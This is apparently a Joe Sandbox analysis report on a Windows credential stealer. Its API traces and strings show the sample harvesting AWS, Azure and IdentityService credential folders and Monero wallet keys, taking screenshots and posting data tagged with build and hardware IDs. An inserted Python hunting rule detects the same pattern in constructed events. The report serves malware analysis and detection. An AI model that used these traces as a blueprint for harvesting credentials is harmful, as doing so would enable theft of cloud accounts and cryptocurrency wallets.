                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                      • String ID: "$------$build_id$hwid
                                      • API String ID: 1585128682-50533134
                                      • Opcode ID: c9e87b40f41453ca4e85ee456a0d7e26cb565f98182b8c2d08a7ce5adfb01ac0
                                      • Instruction ID: 66d5c86c308b6a05fdfd7308c52d057b0f4e6117791a434c22f45abf145b38e3
                                      • Opcode Fuzzy Hash: c9e87b40f41453ca4e85ee456a0d7e26cb565f98182b8c2d08a7ce5adfb01ac0
                                      • Instruction Fuzzy Hash: E3F1307292010CBEDB59EBA0DD92EFEB378AF14780F504179F61262191EF706A19CF64
                                      APIs
                                      • lstrlen.KERNEL32(0030BE14,?,?,?,0030BE14,?), ref: 00309C99
                                      • StrCmpCA.SHLWAPI(?,0031457C,?,0030BE14,?), ref: 00309CCB
                                      • StrCmpCA.SHLWAPI(?,.zip,?,0030BE14,?), ref: 00309CDD
                                      • StrCmpCA.SHLWAPI(?,.zoo,?,0030BE14,?), ref: 00309CE9
                                      • StrCmpCA.SHLWAPI(?,.arc,?,0030BE14,?), ref: 00309CF5
                                      • StrCmpCA.SHLWAPI(?,.lzh,?,0030BE14,?), ref: 00309D01
                                      • StrCmpCA.SHLWAPI(?,.arj,?,0030BE14,?), ref: 00309D0D
                                      • StrCmpCA.SHLWAPI(?,.gz,?,0030BE14,?), ref: 00309D19
                                      • StrCmpCA.SHLWAPI(?,.tgz,?,0030BE14,?), ref: 00309D25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                      • API String ID: 1659193697-51310709
                                      • Opcode ID: 79426d158269ac1a75057216027e42b1f439b61e721425fa445d98d74e7f4f49
                                      • Instruction ID: a5ebce8f0711d07bdd9195f916b5af77593c1a6db297e201cff3360823cb1914
                                      • Opcode Fuzzy Hash: 79426d158269ac1a75057216027e42b1f439b61e721425fa445d98d74e7f4f49
                                      • Instruction Fuzzy Hash: EF01E563A8362621FE2BB27D5D10FEF66CD4D87B9070B0122E514A50C2DB45C9C386B1
                                      APIs
                                      • memset.MSVCRT ref: 00306367
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                      • lstrcat.KERNEL32(?,00000000), ref: 00306389
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 003063A3
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305EBC
                                        • Part of subcall function 00305EA0: FindFirstFileA.KERNEL32(?,?), ref: 00305ED3
                                        • Part of subcall function 00305EA0: StrCmpCA.SHLWAPI(?,003101DC), ref: 00305EFC
                                        • Part of subcall function 00305EA0: StrCmpCA.SHLWAPI(?,003101D8), ref: 00305F16
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305F3B
                                        • Part of subcall function 00305EA0: StrCmpCA.SHLWAPI(?,003101E9), ref: 00305F4A
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305F67
                                        • Part of subcall function 00305EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00305F97
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,02F431A8), ref: 00305FC3
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,003101E0), ref: 00305FD5
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,?), ref: 00305FE3
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,003101E0), ref: 00305FF5
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,?), ref: 00306009
                                      • memset.MSVCRT ref: 003063E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00306408
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00306422
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305F86
                                        • Part of subcall function 00305EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 003060AA
                                        • Part of subcall function 00305EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,003101E9), ref: 00306119
                                      • memset.MSVCRT ref: 0030645F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00306487
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003064A1
                                        • Part of subcall function 00305EA0: FindNextFileA.KERNEL32(?,?), ref: 00306160
                                        • Part of subcall function 00305EA0: FindClose.KERNEL32(?), ref: 00306172
                                      • memset.MSVCRT ref: 003064DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 2861501092-3645552435
                                      • Opcode ID: fee4a4b50fcfbf4a995747216a8058b920666d30c8a7304c91875d175a133198
                                      • Instruction ID: c70212c9f41fdcd744031b1caa33125f525e0018f9a76217cbd77dc3b859ae78
                                      • Opcode Fuzzy Hash: fee4a4b50fcfbf4a995747216a8058b920666d30c8a7304c91875d175a133198
                                      • Instruction Fuzzy Hash: 04418172E5020C76DB2AE7B0CC57FED77286F18740F444968F715661C1EAB0A7988F61
                                      APIs
                                      • strtok_s.MSVCRT ref: 0030202B
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003020C1
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003020FA
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0030213C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0030217E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003021BF
                                      • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00302322
                                      • strtok_s.MSVCRT ref: 003023AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$strtok_s
                                      • String ID: false$true
                                      • API String ID: 2610293679-2658103896
                                      • Opcode ID: 6e611884bd4ea15bd474921b481719443ce217eec09449e077605c2bc9953c25
                                      • Instruction ID: cf34e1bc16bdb887f6f41df8b80c7849625fe15df4cddee6118126a0e067b96e
                                      • Opcode Fuzzy Hash: 6e611884bd4ea15bd474921b481719443ce217eec09449e077605c2bc9953c25
                                      • Instruction Fuzzy Hash: 43A1EBB2D11208ABDB59EBB0DC55EEF737CAF54300F004568F51AA7282EB34A658CF60
                                      APIs
                                      • memset.MSVCRT ref: 002F1A48
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F1A5E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F1A65
                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002F1A82
                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002F1A9C
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • RegCloseKey.ADVAPI32(?), ref: 002F1AA6
                                      • lstrcat.KERNEL32(?,00000000), ref: 002F1AB4
                                      • lstrlen.KERNEL32(?), ref: 002F1AC1
                                      • lstrcat.KERNEL32(?,.keys), ref: 002F1ADC
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 002F1BC6
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F1C32
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileHeaplstrcat$AllocateCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlenmemset
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 2769360516-218353709
                                      • Opcode ID: c05186b34a5114730c4dc94a6266bbbd15ff1476205e2c03fdaa21880a03f98e
                                      • Instruction ID: 21f566dfa8c0255ec4920e8364c0eb2d98e190f7351deaca59a770ad7e5609d5
                                      • Opcode Fuzzy Hash: c05186b34a5114730c4dc94a6266bbbd15ff1476205e2c03fdaa21880a03f98e
                                      • Instruction Fuzzy Hash: 8851437192010CABDB58EBA0DE56EFEB33CAF54780F404538F60662191EB74AA59CF61
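The two function traces above share one pattern: the sample resolves a credential file by a well-known locator (the monero-core wallet_path registry value, or the per-user .aws, .azure and .IdentityService folders via SHGetFolderPathA), copies it into its own working directory with CopyFileA, and later removes the staged copy with DeleteFileA. The following hunting rule is an added example, not part of the Joe Sandbox report and not code from the sample. It runs over a constructed, Sysmon-like event stream; the event schema, the staging path, the allow-list of processes assumed to legitimately own each credential store, and the sample events are all assumptions made for this example.

```python
"""Hunt for credential-file harvesting as seen in the API traces above.

Added example (not the sample's code, not part of the sandbox report).
Flags a process that
  * queries HKCU\SOFTWARE\monero-project\monero-core\wallet_path and then
    copies a file ending in ".keys", noting whether the staged copy was
    deleted afterwards (CopyFileA followed by DeleteFileA in the trace), or
  * reads or copies a file under \.aws\, \.azure\ or \.IdentityService\
    while not being one of the processes assumed to own that store.
Event format, allow-list and sample events are assumptions for this example.
"""
from collections import defaultdict
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class Event:
    pid: int
    image: str      # process image file name, e.g. "aws.exe"
    action: str     # RegQueryValue | FileRead | FileCopy | FileDelete
    target: str     # registry value path, or source file path
    dest: str = ""  # destination path, FileCopy only


# Registry value the sample queries to locate the wallet (from the trace).
MONERO_WALLET_PATH = re.compile(
    r"^HKCU\\SOFTWARE\\monero-project\\monero-core\\wallet_path$", re.IGNORECASE)

# Credential stores the sample walks, mapped to processes that are ASSUMED
# (for this example only) to read them legitimately. Matched case-insensitively.
CLOUD_CRED_STORES = {
    "\\.aws\\": {"aws.exe"},
    "\\.azure\\": {"az.exe", "python.exe"},              # az CLI runs on python
    "\\.identityservice\\": {"powershell.exe", "pwsh.exe", "devenv.exe"},
}


def hunt(events):
    """Return one finding dict per (pid, rule, store) that fires."""
    by_pid = defaultdict(list)
    for ev in events:
        by_pid[ev.pid].append(ev)          # keeps per-process event order
    findings = []
    for pid, evs in by_pid.items():
        image = evs[0].image
        findings.extend(_monero_rule(pid, image, evs))
        findings.extend(_cloud_cred_rule(pid, image, evs))
    return findings


def _monero_rule(pid, image, evs):
    saw_wallet_path = False
    for i, ev in enumerate(evs):
        if ev.action == "RegQueryValue" and MONERO_WALLET_PATH.match(ev.target):
            saw_wallet_path = True
        elif (saw_wallet_path and ev.action == "FileCopy"
              and ev.target.lower().endswith(".keys")):
            # Stealer pattern from the trace: stage the copy, then wipe it.
            wiped = any(e.action == "FileDelete" and e.target.lower() == ev.dest.lower()
                        for e in evs[i + 1:])
            return [{"pid": pid, "image": image, "rule": "monero_wallet_keys_copied",
                     "evidence": ev.target, "staged_copy_deleted": wiped}]
    return []


def _cloud_cred_rule(pid, image, evs):
    out, seen = [], set()
    for ev in evs:
        if ev.action not in ("FileRead", "FileCopy"):
            continue
        path = ev.target.lower()
        for marker, owners in CLOUD_CRED_STORES.items():
            if marker in path and image.lower() not in owners and marker not in seen:
                seen.add(marker)
                out.append({"pid": pid, "image": image,
                            "rule": "cloud_credential_store_access",
                            "evidence": ev.target, "store": marker})
    return out


# Constructed sample events (not a real capture). Staging dir is an assumption;
# the "Azure\.IdentityService" subfolder mirrors the string IDs in the trace.
SAMPLE = "SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
U = "C:\\Users\\alice"
STAGE = "C:\\ProgramData\\stage"
CONSTRUCTED_EVENTS = [
    Event(2020, "aws.exe", "FileRead", U + "\\.aws\\credentials"),            # benign
    Event(3030, "monero-wallet-gui.exe", "RegQueryValue",                     # benign
          "HKCU\\SOFTWARE\\monero-project\\monero-core\\wallet_path"),
    Event(4711, SAMPLE, "RegQueryValue",
          "HKCU\\SOFTWARE\\monero-project\\monero-core\\wallet_path"),
    Event(4711, SAMPLE, "FileCopy", U + "\\Documents\\Monero\\wallet.keys",
          STAGE + "\\wallet.keys"),
    Event(4711, SAMPLE, "FileDelete", STAGE + "\\wallet.keys"),
    Event(4711, SAMPLE, "FileRead", U + "\\.aws\\credentials"),
    Event(4711, SAMPLE, "FileRead", U + "\\.azure\\msal_token_cache.bin"),
    Event(4711, SAMPLE, "FileCopy", U + "\\.IdentityService\\msal.cache",
          STAGE + "\\Azure\\.IdentityService\\msal.cache"),
]

if __name__ == "__main__":
    for finding in hunt(CONSTRUCTED_EVENTS):
        print(finding)
```

The Monero rule deliberately requires the registry lookup and a subsequent .keys copy from the same process: a wallet GUI reads wallet_path on every start, so the lookup alone is not a signal. The cloud-store rule is allow-list based and will need the owner set tuned to the environment; the point is that the stores the sample walks are read by a very small set of processes in normal operation.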
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: 53e3bc76cbd15782815e24053d321f7fd82aeccf7ccb11f640b50d0bbca06215
                                      • Instruction ID: 7ba6f7b00a2871caf35fc6936a9b1d3b1e233078b8b522eb762a5bbf3ff1b901
                                      • Opcode Fuzzy Hash: 53e3bc76cbd15782815e24053d321f7fd82aeccf7ccb11f640b50d0bbca06215
                                      • Instruction Fuzzy Hash: 4941C2B0E45B08AADB22AF749C6D997B7ACBF16749B104928F407E3081E770D2058B18
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00301592
                                      • GetDesktopWindow.USER32 ref: 0030159C
                                      • GetWindowRect.USER32(00000000,?), ref: 003015A9
                                      • SelectObject.GDI32(00000000,00000000), ref: 003015D5
                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00301651
                                      • GlobalLock.KERNEL32(?), ref: 0030165B
                                      • GlobalSize.KERNEL32(?), ref: 00301668
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                      • String ID: image/jpeg
                                      • API String ID: 1264946473-3785015651
                                      • Opcode ID: 26b54789188ad47223c0ea7fe78f1c3889746bd2098d6cd526535228a948fd0a
                                      • Instruction ID: 01f9dd3f7f9b2661a05b7f9c8a4523f75b20f5732d6c68871d38b7780c6a80cb
                                      • Opcode Fuzzy Hash: 26b54789188ad47223c0ea7fe78f1c3889746bd2098d6cd526535228a948fd0a
